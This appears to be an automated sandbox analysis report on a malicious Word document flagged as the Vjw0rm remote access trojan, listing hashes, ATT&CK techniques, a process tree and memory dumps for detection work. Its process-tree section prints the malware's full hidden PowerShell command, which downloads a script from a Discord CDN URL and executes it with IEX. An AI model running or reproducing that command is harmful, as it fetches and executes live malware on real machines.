vjw0rm | 44ceb0661cb7a7920cb2f75d8b30608e921d1a6a6d73045a40e3271856aa811a

General

Target

44ceb0661cb7a7920cb2f75d8b30608e921d1a6a6d73045a40e3271856aa811a.doc
Size

15KB
MD5

7667baf4600d631f7aab1299604c9e8d
SHA1

ba5e3292901e3703621e81d23a9c8486ad42b835
SHA256

44ceb0661cb7a7920cb2f75d8b30608e921d1a6a6d73045a40e3271856aa811a
SHA512

fb85252cd011972a1ea4658cc5b9f9a80d6bdc2bd7219b4d04cbfb5eff5ee4e935addd1b5e104a9679ea4badfbde342b4df776de61343018e963b0308407c3a5

Score

10^/10

vjw0rm trojan worm

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

https://cdn.discordapp.com/attachments/869602547248283711/877244888020840448/Main.png

Signatures

Vjw0rm
Vjw0rm is a remote access trojan written in JavaScript.
trojan worm vjw0rm

Blocklisted process makes network request 15 IoCs

Processes:

WScript.exepowershell.exe

flow	pid	process
33	2916	WScript.exe
34	1728	powershell.exe
35	2916	WScript.exe
36	2916	WScript.exe
38	2916	WScript.exe
39	2916	WScript.exe
44	2916	WScript.exe
45	2916	WScript.exe
46	2916	WScript.exe
47	2916	WScript.exe
48	2916	WScript.exe
49	2916	WScript.exe
50	2916	WScript.exe
51	2916	WScript.exe
52	2916	WScript.exe

Downloads MZ/PE file
Executes dropped EXE 2 IoCs

Processes:

Requerimiento.exe2.exe

pid process

4072 Requerimiento.exe
2456 2.exe

pid	process
4072	Requerimiento.exe
2456	2.exe

Drops startup file 2 IoCs

Processes:

WScript.exe

description	ioc	process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\4.js	WScript.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\4.js	WScript.exe

Uses the VBS compiler for execution 1 TTPs

Scripting
T1064
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Checks processor information in registry 2 TTPs 3 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

Processes:

WINWORD.EXE

description	ioc	process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	WINWORD.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	WINWORD.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	WINWORD.EXE

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

Processes:

WINWORD.EXE

description	ioc	process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	WINWORD.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily	WINWORD.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	WINWORD.EXE

Modifies registry class 1 IoCs

Processes:

Requerimiento.exe

description ioc process

Key created \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings Requerimiento.exe
Suspicious behavior: AddClipboardFormatListener 2 IoCs

Processes:

WINWORD.EXE

pid process

2896 WINWORD.EXE
2896 WINWORD.EXE
Suspicious behavior: EnumeratesProcesses 5 IoCs

Processes:

powershell.exe2.exe

pid process

1728 powershell.exe
1728 powershell.exe
1728 powershell.exe
2456 2.exe
2456 2.exe
Suspicious use of AdjustPrivilegeToken 2 IoCs

Processes:

2.exepowershell.exe

description pid process

Token: SeDebugPrivilege 2456 2.exe
Token: SeDebugPrivilege 1728 powershell.exe
Suspicious use of FindShellTrayWindow 2 IoCs

Processes:

WINWORD.EXE

pid process

2896 WINWORD.EXE
2896 WINWORD.EXE

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings	Requerimiento.exe

pid	process
1728	powershell.exe
1728	powershell.exe
1728	powershell.exe
2456	2.exe
2456	2.exe

description	pid	process
Token: SeDebugPrivilege	2456	2.exe
Token: SeDebugPrivilege	1728	powershell.exe

Suspicious use of SetWindowsHookEx 19 IoCs

Processes:

WINWORD.EXE

pid	process
2896	WINWORD.EXE
2896	WINWORD.EXE
2896	WINWORD.EXE
2896	WINWORD.EXE
2896	WINWORD.EXE
2896	WINWORD.EXE
2896	WINWORD.EXE
2896	WINWORD.EXE
2896	WINWORD.EXE
2896	WINWORD.EXE
2896	WINWORD.EXE
2896	WINWORD.EXE
2896	WINWORD.EXE
2896	WINWORD.EXE
2896	WINWORD.EXE
2896	WINWORD.EXE
2896	WINWORD.EXE
2896	WINWORD.EXE
2896	WINWORD.EXE

Suspicious use of WriteProcessMemory 21 IoCs

Processes:

WINWORD.EXERequerimiento.exeWScript.execmd.exe2.exe

description	pid	process	target process
PID 2896 wrote to memory of 4072	2896	WINWORD.EXE	Requerimiento.exe
PID 2896 wrote to memory of 4072	2896	WINWORD.EXE	Requerimiento.exe
PID 2896 wrote to memory of 4072	2896	WINWORD.EXE	Requerimiento.exe
PID 4072 wrote to memory of 2456	4072	Requerimiento.exe	2.exe
PID 4072 wrote to memory of 2456	4072	Requerimiento.exe	2.exe
PID 4072 wrote to memory of 2456	4072	Requerimiento.exe	2.exe
PID 4072 wrote to memory of 3612	4072	Requerimiento.exe	WScript.exe
PID 4072 wrote to memory of 3612	4072	Requerimiento.exe	WScript.exe
PID 4072 wrote to memory of 3612	4072	Requerimiento.exe	WScript.exe
PID 3612 wrote to memory of 2204	3612	WScript.exe	cmd.exe
PID 3612 wrote to memory of 2204	3612	WScript.exe	cmd.exe
PID 3612 wrote to memory of 2204	3612	WScript.exe	cmd.exe
PID 2204 wrote to memory of 1728	2204	cmd.exe	powershell.exe
PID 2204 wrote to memory of 1728	2204	cmd.exe	powershell.exe
PID 2204 wrote to memory of 1728	2204	cmd.exe	powershell.exe
PID 4072 wrote to memory of 2916	4072	Requerimiento.exe	WScript.exe
PID 4072 wrote to memory of 2916	4072	Requerimiento.exe	WScript.exe
PID 4072 wrote to memory of 2916	4072	Requerimiento.exe	WScript.exe
PID 2456 wrote to memory of 4408	2456	2.exe	vbc.exe
PID 2456 wrote to memory of 4408	2456	2.exe	vbc.exe
PID 2456 wrote to memory of 4408	2456	2.exe	vbc.exe

C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE
"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\44ceb0661cb7a7920cb2f75d8b30608e921d1a6a6d73045a40e3271856aa811a.doc" /o ""
1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2896

C:\Users\Admin\AppData\Local\Temp\Requerimiento.exe
C:\Users\Admin\AppData\Local\Temp\Requerimiento.exe
2⤵
- Executes dropped EXE
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:4072

C:\Users\Admin\AppData\Local\Temp\2.exe
"C:\Users\Admin\AppData\Local\Temp\2.exe"
3⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2456

C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
"\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"
4⤵
PID:4408

C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\3.vbs"
3⤵
- Suspicious use of WriteProcessMemory
PID:3612

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c powershell -ExecutionPolicy Bypass -windowstyle hidden -noexit -command [System.Net.WebClient]$webClient = New-Object System.Net.WebClient;[System.IO.Stream]$stream = $webClient.OpenRead('https://cdn.discordapp.com/attachments/869602547248283711/877244888020840448/Main.png');[System.IO.StreamReader]$sr = New-Object System.IO.StreamReader -argumentList $stream;[string]$results = $sr.ReadToEnd();IEX $results; hackbacktrack
4⤵
- Suspicious use of WriteProcessMemory
PID:2204

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -ExecutionPolicy Bypass -windowstyle hidden -noexit -command [System.Net.WebClient]$webClient = New-Object System.Net.WebClient;[System.IO.Stream]$stream = $webClient.OpenRead('https://cdn.discordapp.com/attachments/869602547248283711/877244888020840448/Main.png');[System.IO.StreamReader]$sr = New-Object System.IO.StreamReader -argumentList $stream;[string]$results = $sr.ReadToEnd();IEX $results; hackbacktrack
5⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1728

C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\4.js"
3⤵
- Blocklisted process makes network request
- Drops startup file
PID:2916

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Scripting

1

T1064

Persistence

Privilege Escalation

Defense Evasion

Scripting

1

T1064

Credential Access

Discovery

System Information Discovery

3

T1082

Query Registry

2

T1012

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\2.exe
MD5
12be709e545bd7cc299ac774db10df56

SHA1
da60713fa2252e9ae121fbddb4b6233c63631652

SHA256
4d4c674dff6b475809611b56a32988a72419d7e3342d2ccd6370ab4a887a2c9b

SHA512
a55fee706e0634024e5adbd99e369e1ad6e2299faa69d3fa50056384ae70bfa107c051dfe14e64dd4281b7ae0df565d0ec2239398fad93ea0b6753f482b7eb43

Download Submit
C:\Users\Admin\AppData\Local\Temp\2.exe
MD5
12be709e545bd7cc299ac774db10df56

SHA1
da60713fa2252e9ae121fbddb4b6233c63631652

SHA256
4d4c674dff6b475809611b56a32988a72419d7e3342d2ccd6370ab4a887a2c9b

SHA512
a55fee706e0634024e5adbd99e369e1ad6e2299faa69d3fa50056384ae70bfa107c051dfe14e64dd4281b7ae0df565d0ec2239398fad93ea0b6753f482b7eb43

Download Submit
C:\Users\Admin\AppData\Local\Temp\3.vbs
MD5
35054bdb043705bb9c1c8a594f69d6fb

SHA1
bce72d39604c130f8dcef8b3acf13fe8291ca476

SHA256
430328793e41c6843633bb0877aa02d7343a6f1d8fb903d4cac514031308979b

SHA512
213b0a51071fdb7e2771465095f5f7ea89eb690e37e05e4aa877314e3b3766beb26e8ef78b4ef4cd3a78f4cd6002697ff4b84740b81214cbea1c4361ef9615e7

Download Submit
C:\Users\Admin\AppData\Local\Temp\4.js
MD5
3ed2dd265f168e2b71606ee0dfc67b43

SHA1
1ea61c18fdf136a36e600194abecf11e173c745d

SHA256
139b6fa0515cc409d3004b231b29711174c7661cc21805544ffe84c596c0feb7

SHA512
79eac0543a25539489b2c1cc20636e1f8660b4d405ebb0cab743b42de982360b191b83b40fe5a24ff4a4d3cc21872be6f45f00d4d3a88265dc199b54080a0eb8

Download Submit
C:\Users\Admin\AppData\Local\Temp\Requerimiento.exe
MD5
4c8b8d244f471478ad5c6bb4babb279e

SHA1
d7a22176243764fa8e499405597d612eb36cfbbd

SHA256
a3bda5240c364f1afd8a70384330092c99eb8d1c0133cf0c2e4e0dfaf927d6d8

SHA512
608e69ea5e59b4a00359ec3dc5b65da689ff1908e6ee0ad5a8824fd774fcfb39abaedfe3c84142734a3d12019844196e0e5b4fe1f00e76c251662f4677b148ff

Download Submit
C:\Users\Admin\AppData\Local\Temp\Requerimiento.exe
MD5
4c8b8d244f471478ad5c6bb4babb279e

SHA1
d7a22176243764fa8e499405597d612eb36cfbbd

SHA256
a3bda5240c364f1afd8a70384330092c99eb8d1c0133cf0c2e4e0dfaf927d6d8

SHA512
608e69ea5e59b4a00359ec3dc5b65da689ff1908e6ee0ad5a8824fd774fcfb39abaedfe3c84142734a3d12019844196e0e5b4fe1f00e76c251662f4677b148ff

Download Submit
memory/1728-322-0x0000000009060000-0x0000000009061000-memory.dmp

Filesize
4KB

Download
memory/1728-304-0x0000000008490000-0x0000000008491000-memory.dmp

Filesize
4KB

Download
memory/1728-332-0x0000000006C53000-0x0000000006C54000-memory.dmp

Filesize
4KB

Download
memory/1728-331-0x00000000094D0000-0x00000000094E2000-memory.dmp

Filesize
72KB

Download
memory/1728-330-0x00000000094A0000-0x00000000094A2000-memory.dmp

Filesize
8KB

Download
memory/1728-329-0x0000000009490000-0x0000000009492000-memory.dmp

Filesize
8KB

Download
memory/1728-328-0x0000000009120000-0x0000000009121000-memory.dmp

Filesize
4KB

Download
memory/1728-327-0x0000000009A40000-0x0000000009A41000-memory.dmp

Filesize
4KB

Download
memory/1728-313-0x0000000008F20000-0x0000000008F21000-memory.dmp

Filesize
4KB

Download
memory/1728-299-0x0000000006C50000-0x0000000006C51000-memory.dmp

Filesize
4KB

Download
memory/1728-303-0x0000000007BE0000-0x0000000007BE1000-memory.dmp

Filesize
4KB

Download
memory/1728-301-0x0000000006C52000-0x0000000006C53000-memory.dmp

Filesize
4KB

Download
memory/1728-287-0x0000000000000000-mapping.dmp

Download
memory/1728-290-0x0000000004750000-0x0000000004751000-memory.dmp

Filesize
4KB

Download
memory/1728-291-0x0000000007290000-0x0000000007291000-memory.dmp

Filesize
4KB

Download
memory/1728-292-0x00000000071C0000-0x00000000071C1000-memory.dmp

Filesize
4KB

Download
memory/1728-293-0x00000000078C0000-0x00000000078C1000-memory.dmp

Filesize
4KB

Download
memory/1728-294-0x0000000007B10000-0x0000000007B11000-memory.dmp

Filesize
4KB

Download
memory/1728-295-0x0000000007C60000-0x0000000007C61000-memory.dmp

Filesize
4KB

Download
memory/2204-286-0x0000000000000000-mapping.dmp

Download
memory/2456-284-0x0000000000880000-0x0000000000881000-memory.dmp

Filesize
4KB

Download
memory/2456-298-0x00000000050E0000-0x00000000050E1000-memory.dmp

Filesize
4KB

Download
memory/2456-338-0x0000000005BC0000-0x00000000060BE000-memory.dmp

Filesize
5.0MB

Download
memory/2456-337-0x0000000005E30000-0x0000000005E31000-memory.dmp

Filesize
4KB

Download
memory/2456-336-0x00000000060C0000-0x00000000060C1000-memory.dmp

Filesize
4KB

Download
memory/2456-335-0x0000000005B60000-0x0000000005BBF000-memory.dmp

Filesize
380KB

Download
memory/2456-279-0x0000000000000000-mapping.dmp

Download
memory/2896-119-0x00007FFDF5C60000-0x00007FFDF5C70000-memory.dmp

Filesize
64KB

Download
memory/2896-117-0x00007FFDF5C60000-0x00007FFDF5C70000-memory.dmp

Filesize
64KB

Download
memory/2896-114-0x00007FFDF5C60000-0x00007FFDF5C70000-memory.dmp

Filesize
64KB

Download
memory/2896-118-0x00007FFE176B0000-0x00007FFE1A1D3000-memory.dmp

Filesize
43.1MB

Download
memory/2896-122-0x00007FFE12580000-0x00007FFE1366E000-memory.dmp

Filesize
16.9MB

Download
memory/2896-116-0x00007FFDF5C60000-0x00007FFDF5C70000-memory.dmp

Filesize
64KB

Download
memory/2896-123-0x00007FFE0EEB0000-0x00007FFE10DA5000-memory.dmp

Filesize
31.0MB

Download
memory/2896-115-0x00007FFDF5C60000-0x00007FFDF5C70000-memory.dmp

Filesize
64KB

Download
memory/2916-296-0x0000000000000000-mapping.dmp

Download
memory/3612-282-0x0000000000000000-mapping.dmp

Download
memory/4072-226-0x0000000000000000-mapping.dmp

Download

Analysis

Sharing

General

Malware Config

Extracted

Signatures

Processes

Network

MITRE ATT&CK Matrix ATT&CK v6

Replay Monitor

Loading Replay Monitor...

Downloads